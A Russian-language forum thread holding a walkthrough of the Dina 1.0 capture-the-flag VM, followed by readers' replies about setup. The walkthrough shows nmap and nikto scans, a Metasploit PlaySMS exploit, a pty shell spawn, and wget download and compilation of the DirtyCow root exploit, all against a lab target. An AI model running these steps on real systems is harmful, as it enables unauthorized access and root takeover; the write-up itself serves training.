 |
|

28.05.2018, 16:41
|
|
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами:
8170166
Репутация:
0
|
|
Всем привет! Появилась недавно идея совместного прохождения CTF с модератором @gx6060, буду выкладывать наши варианты прохождения, от простых к сложным с описанием техник. Я уже делал подобные обзоры в одиночку, но две головы интереснее.
Взяли несложную Dina 1.0.
Для начала, как обычно немного разведки:
Код:
Dina обнаружилась в сети под адресом 192.168.0.107, далее nmap:
Код:
Код:
nmap –sV –A 192.168.0.107
Среди всей информации, интерес представляет директория /nothing, так как, при просмотре исходного кода мы находим список паролей:
Ну и конечно, необходимо подключить nikto, т.к. больше ничего интересного не нашлось.
Код:
Код:
nikto –h 192.168.0.107
Директория /secure содержит запароленный архив с бэкапом, нетрудно догадаться, что правильным будет один из паролей в найденном ранее списке.
Содержимое архива – это файл MP3 который таковым не является, смотрим на него через notepad++ к примеру.
Переходим по ссылке, нас встречает сервис PlaySMS, пароль опять подбираем из списка найденных.
Прежде чем копать дальше, можно параллельно запустить поиск эксплоитов на этот сервис по Metasploit, Google тоже предлагает несколько вариантов эксплуатации, но этот вариант приемлемей:
Код:
Код:
msfconsole
search playsms
По описанию, этот эксплоит должен идеально подойти, задаем необходимые параметры для работы эксплойта:
Запускаем:
Код:
Две трети работы сделано, теперь необходимо подумать над вектором повышения привилегий, переходим в шелл и импортируем оболочку:
Код:
Код:
shell
python -c 'import pty;pty.spawn("/bin/bash")'
Долго думать не пришлось, вспомнил про firefart dirtycow exploit, мы имеем право записи в папку /tmp, туда его и скопируем:
Код:
Код:
wget https://www.exploit-db.com/download/40839.c --no-check-certificate
Переименуем и скомпилируем:
Код:
Код:
gcc -pthread dirty.c -o dirty –lcrypt
Запускаем эксплоит и вводим новый пароль, для ново созданного пользователя firefart:
Код:
Переподключаемся к шеллу и меняем пользователя на firefart:
Код:
Теперь осталось взять флаг:
Код:
Код:
cd /root
cat flag.txt
На этом прохождение Diana 1.0. можно считать законченным. Спасибо за внимание.
P.S. Можно было провернуть это и через гостевую сессию, и пройти ее минуты за полторы, но так неинтересно)

|
|
|

28.05.2018, 18:44
|
|
Новичок
Регистрация: 31.05.2018
Сообщений: 0
С нами:
4185841
Репутация:
0
|
|
Интересно...
|
|
|

28.05.2018, 19:38
|
|
Новичок
Регистрация: 10.01.2018
Сообщений: 0
С нами:
4389206
Репутация:
0
|
|
Ищщщё!! )
|
|
|

30.05.2018, 09:17
|
|
Новичок
Регистрация: 10.01.2018
Сообщений: 0
С нами:
4389206
Репутация:
0
|
|
Tihon49 сказал(а):
Ищщщё!! )
не рабоает следующая строчка:
выдает такое сообщение:
|
|
|

30.05.2018, 10:20
|
|
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами:
8170166
Репутация:
0
|
|
Tihon49 сказал(а):
не рабоает следующая строчка:
В папку /tmp копируй
|
|
|

30.05.2018, 18:36
|
|
Новичок
Регистрация: 20.12.2017
Сообщений: 0
С нами:
4419817
Репутация:
0
|
|
Всё круто, для тупых объясните: это виртуальная машина? Где её можно скачать? Чтобы по вашим следам пробежаться))
|
|
|

30.05.2018, 18:58
|
|
Новичок
Регистрация: 10.01.2018
Сообщений: 0
С нами:
4389206
Репутация:
0
|
|
Qmakake сказал(а):
Всё круто, для тупых объясните: это виртуальная машина? Где её можно скачать? Чтобы по вашим следам пробежаться))
Да, это VM. Как поставить на кали - смотри Ютюб. Правда могут возникнуть проблемы с дровами... Ну напишешь, если чё, помогу. После того как поставил vm, качаешь Диану тут
Как скачает, спросит открыть ли с помощью vm, жмешь да. Готово. Далее по стопам ТС'а.
|
|
|

30.05.2018, 22:41
|
|
Новичок
Регистрация: 31.05.2018
Сообщений: 0
С нами:
4185841
Репутация:
0
|
|
Tihon49 сказал(а):
Да, это VM. Как поставить на кали - смотри Ютюб. Правда могут возникнуть проблемы с дровами... Ну напишешь, если чё, помогу. После того как поставил vm, качаешь Диану тут
Как скачает, спросит открыть ли с помощью vm, жмешь да. Готово. Далее по стопам ТС'а.
Я как раз щас качаю ее)
|
|
|

30.05.2018, 22:52
|
|
Новичок
Регистрация: 10.01.2018
Сообщений: 0
С нами:
4389206
Репутация:
0
|
|
Честно говоря сам только узнал про такую интересную тему как Capture The Flag. Очень интересно! Сейчас качаю другие. Буду пробовать додумать сам, хоть что-нибудь!
|
|
|

31.05.2018, 11:54
|
|
Новичок
Регистрация: 10.01.2018
Сообщений: 0
С нами:
4389206
Репутация:
0
|
|
Перестал работать netdiscover...
Только роутер видит. Пробовал, зачем-то, запустить xerosploit, так и он перестал работать, просит xettercap, с которым ещё вчера проблем не было.
С чего вдруг такое могло произойти?
Как мне думается это произошло после того как я запустил команду apt-get dist-upgrade. До этого я сидел на версии кали 2017.1
Бывалые, поможите чем можИте?
Я честно искал как исправить...
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|